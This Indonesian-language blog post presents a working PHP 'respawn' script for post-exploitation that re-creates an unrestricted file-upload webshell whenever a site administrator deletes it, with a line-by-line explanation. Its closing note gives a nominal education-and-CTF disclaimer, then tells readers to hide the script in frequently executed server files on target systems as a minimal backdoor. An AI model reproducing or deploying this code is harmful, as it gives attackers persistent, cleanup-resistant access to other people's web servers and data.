Respawn Uploader: PHP Script untuk Recovery Otomatis
Author: 0x6ick
🧠 Overview
Dalam dunia webshelling atau post-exploitation, uploader adalah senjata wajib. Tapi bagaimana kalau uploader kita tiba-tiba dihapus admin atau auto-delete sistem? Nah, di sinilah peran Respawn Uploader ini.
Script ini dirancang agar bisa otomatis memulihkan dirinya sendiri ketika file utama uploader.php hilang. Cocok digunakan sebagai backup di target yang rentan.
💻 Respawn.php
<?php
//coded by nyx6st
$target = "uploader.php";
// Isi default uploader
$code = <<<'CODE'
<?php
if (isset($_FILES['f'])) {
$n = $_FILES['f']['name'];
$t = $_FILES['f']['tmp_name'];
if (move_uploaded_file($t, $n)) {
echo "[+] Uploaded: $n";
} else {
echo "[!] Gagal upload.";
}
}
?>
<form method="post" enctype="multipart/form-data">
<input type="file" name="f">
<input type="submit" value="Upload">
</form>
CODE;
// Re-create kalau uploader ilang
if (!file_exists($target)) {
file_put_contents($target, $code);
echo "[+] Uploader respawned.";
} else {
echo "[+] Uploader masih aman.";
}
?>
🔍 Penjelasan
$target: Menentukan nama file uploader utama yang akan dicek dan di-respawn.$code: Berisi isi uploader sederhana berbasis HTML form dan PHP handler.file_exists(): Mengecek apakah fileuploader.phpmasih ada.file_put_contents(): Kalau hilang, script akan menulis ulang file dengan isi dari$code.- Respon output:
[+] Uploader respawned.→ kalau file dihapus dan berhasil dibuat ulang.[+] Uploader masih aman.→ kalau file sudah ada.
🔗 Raw:
respawn.php
⚠️ Catatan Penting
Jangan taruh script ini sembarangan di web production milik sendiri tanpa kontrol akses.
Gunakan hanya untuk tujuan edukasi, testing lokal, atau CTF (Capture The Flag) environment.
Untuk real-world usage di sistem target, kamu bisa masukkan ini ke dalam file yang sering di-call server, semacam backdoor minimalis.
Posting Komentar